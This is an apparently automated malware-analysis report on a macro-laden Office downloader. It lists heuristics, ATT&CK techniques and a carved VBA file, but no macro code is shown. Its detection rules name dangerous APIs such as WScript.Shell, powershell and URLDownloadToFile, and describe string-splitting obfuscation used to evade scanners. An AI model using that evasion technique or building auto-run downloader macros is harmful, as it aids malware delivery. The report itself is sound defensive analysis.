Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' indicates that dangerous API names like 'Win32_Process' are reassembled from split string literals, a common obfuscation technique. The 'AutoOpen' macro and 'GetObject' call suggest that the macro is designed to execute automatically upon opening the document, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Downloader.00536d-6895734-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6895734-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call present.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43966 bytes |

SHA-256 (macros.bas): ce238ff237be5acbd3bffe453cc78129356f902cb2ed24436c2d11e705da7dba

Script preview: first 1,000 lines of the extracted script.